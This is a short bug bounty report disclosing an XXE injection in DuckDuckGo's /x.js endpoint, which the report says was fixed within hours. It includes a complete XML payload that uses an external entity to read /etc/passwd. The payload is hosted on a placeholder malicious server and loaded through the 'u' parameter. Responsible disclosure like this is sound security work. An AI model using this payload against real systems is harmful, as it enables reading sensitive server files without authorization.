XXE on https://duckduckgo.com
Discovered by mik317 on Duckduckgo

This issue took 0 Days and 0 hours to triage and 0 Days and 12 hours to resolve once triaged.



Summary: Hi DuckDuckGo team, I'm not sure of this vulnerability, but I'd like to try my luck; The https://duckduckgo.com domain is vulnerable against an XXE injection in the /x.js endpoint, in the ?u parameter. This resource simply fetch a xml-formatted file, and so returns an output. The problem is that there isn't any control against the xml input, and the output can return the result of some xml entities parsed.

Steps:

  1. Attacker uploads a file with the following content inside his malicious server (reachable remotely)
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>
  1. Now upload it on his server, and goes on https://duckduckgo.com/x.js?u=http://malicious_server/xxe.xml
  2. The result parsed of the file includes the entity with the content of the /etc/passwd {F410529}

I'm not sure that the execution occurs inside the machine and not only in a sandbox, anyway I want try my luck :)

Impact

XXE injection, LFI, probably RCE